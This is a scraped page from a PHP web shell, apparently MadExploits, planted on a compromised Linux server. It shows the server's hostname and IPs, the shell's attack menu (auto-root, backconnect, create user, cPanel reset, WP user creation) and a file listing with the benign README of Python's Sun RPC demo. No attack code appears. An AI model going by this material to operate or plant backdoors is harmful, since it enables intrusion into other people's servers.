Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.189.186.5
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
python2.7 /
Demo /
rpc /
[ HOME SHELL ]
Name
Size
Permission
Action
MANIFEST
361
B
-rw-r--r--
README
1.23
KB
-rw-r--r--
T.py
575
B
-rw-r--r--
T.pyc
952
B
-rw-r--r--
T.pyo
952
B
-rw-r--r--
mountclient.py
6.48
KB
-rw-r--r--
mountclient.pyc
5.58
KB
-rw-r--r--
mountclient.pyo
5.58
KB
-rw-r--r--
nfsclient.py
5.2
KB
-rw-r--r--
nfsclient.pyc
6.74
KB
-rw-r--r--
nfsclient.pyo
6.74
KB
-rw-r--r--
rnusersclient.py
2.57
KB
-rw-r--r--
rnusersclient.pyc
5.01
KB
-rw-r--r--
rnusersclient.pyo
5.01
KB
-rw-r--r--
rpc.py
26.98
KB
-rw-r--r--
rpc.pyc
29.72
KB
-rw-r--r--
rpc.pyo
29.72
KB
-rw-r--r--
test
697
B
-rwxr-xr-x
xdr.py
4.93
KB
-rw-r--r--
xdr.pyc
7.71
KB
-rw-r--r--
xdr.pyo
7.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
This is a Python interface to Sun RPC, designed and implemented mostly by reading the Internet RFCs about the subject. *** NOTE: xdr.py has evolved into the standard module xdrlib.py *** There are two library modules, xdr.py and rpc.py, and several example clients: mountclient.py, nfsclient.py, and rnusersclient.py, implementing the NFS Mount protocol, (part of) the NFS protocol, and the "rnusers" protocol (used by rusers(1)), respectively. The latter demonstrates the use of broadcast via the Port mapper's CALLIT procedure. There is also a way to create servers in Python. To test the nfs client, run it from the shell with something like this: python -c 'import nfsclient; nfsclient.test()' [hostname [filesystemname]] When called without a filesystemname, it lists the filesystems at the host; default host is the local machine. Other clients are tested similarly. For hostname, use e.g. wuarchive.wustl.edu or gatekeeper.dec.com (two hosts that are known to export NFS filesystems with little restrictions). There are now two different RPC compilers: 1) Wim Lewis rpcgen.py found on http://www.omnigroup.com/~wiml/soft/stale-index.html#python. 2) Peter �strands rpcgen.py, which is part of "pynfs" (http://www.cendio.se/~peter/pynfs/).
Close